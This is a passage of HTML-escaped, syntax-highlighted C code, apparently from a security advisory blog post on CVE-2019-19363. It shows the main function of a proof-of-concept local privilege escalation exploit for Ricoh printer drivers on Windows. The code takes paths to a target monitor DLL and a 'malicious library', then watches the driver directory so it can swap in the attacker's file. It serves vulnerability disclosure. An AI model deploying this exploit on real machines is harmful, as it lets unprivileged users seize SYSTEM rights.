&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-132"&gt;&lt;code data-line-number="132"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-132" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-132"&gt;&lt;/a&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-133"&gt;&lt;code data-line-number="133"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-133" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-133"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-134"&gt;&lt;code data-line-number="134"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-134" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-134"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-135"&gt;&lt;code data-line-number="135"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-135" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-135"&gt;&lt;/a&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;wmain&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;WCHAR&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[])&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-136"&gt;&lt;code data-line-number="136"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-136" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-136"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;HANDLE&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="n"&gt;hCompPort&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt;                 &lt;/span&gt;&lt;span class="c1"&gt;// Handle To a Completion Port&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-137"&gt;&lt;code data-line-number="137"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-137" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-137"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-138"&gt;&lt;code data-line-number="138"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-138" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-138"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-139"&gt;&lt;code data-line-number="139"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-139" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-139"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;PrinterName&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-140"&gt;&lt;code data-line-number="140"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-140" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-140"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;TargetDllFullFilePath&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-141"&gt;&lt;code data-line-number="141"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-141" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-141"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;TargetDLLRelFilePath&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-142"&gt;&lt;code data-line-number="142"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-142" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-142"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;MaliciousLibraryFile&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-143"&gt;&lt;code data-line-number="143"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-143" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-143"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;change_counter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;_wtoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-144"&gt;&lt;code data-line-number="144"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-144" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-144"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-145"&gt;&lt;code data-line-number="145"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-145" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-145"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-146"&gt;&lt;code data-line-number="146"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-146" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-146"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ Usage: %s &amp;lt;printer_name&amp;gt; &amp;lt;fullpath_monitor_dll&amp;gt; &amp;lt;rel_path_monitor_dll&amp;gt; &amp;lt;new_dll&amp;gt; &amp;lt;counter&amp;gt;&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-147"&gt;&lt;code data-line-number="147"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-147" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-147"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-148"&gt;&lt;code data-line-number="148"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-148" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-148"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-149"&gt;&lt;code data-line-number="149"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-149" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-149"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ Monitoring directory %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;BaseDirName&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-150"&gt;&lt;code data-line-number="150"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-150" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-150"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-151"&gt;&lt;code data-line-number="151"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-151" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-151"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="c1"&gt;// Get a handle to the directory&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-152"&gt;&lt;code data-line-number="152"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-152" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-152"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hDir&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;CreateFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;BaseDirName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-153"&gt;&lt;code data-line-number="153"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-153" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-153"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;FILE_LIST_DIRECTORY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-154"&gt;&lt;code data-line-number="154"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-154" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-154"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;FILE_SHARE_READ&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FILE_SHARE_WRITE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FILE_SHARE_DELETE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-155"&gt;&lt;code data-line-number="155"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-155" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-155"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-156"&gt;&lt;code data-line-number="156"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-156" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-156"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;OPEN_EXISTING&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-157"&gt;&lt;code data-line-number="157"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-157" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-157"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;FILE_FLAG_BACKUP_SEMANTICS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FILE_FLAG_OVERLAPPED&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-158"&gt;&lt;code data-line-number="158"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-158" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-158"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-159"&gt;&lt;code data-line-number="159"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-159" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-159"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-160"&gt;&lt;code data-line-number="160"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-160" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-160"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hDir&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;INVALID_HANDLE_VALUE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-161"&gt;&lt;code data-line-number="161"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-161" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-161"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"Unable to open directory %s. GLE=%ld. Terminating...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-162"&gt;&lt;code data-line-number="162"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-162" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-162"&gt;&lt;/a&gt;&lt;span class="w"&gt;                        &lt;/span&gt;&lt;span class="n"&gt;BaseDirName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
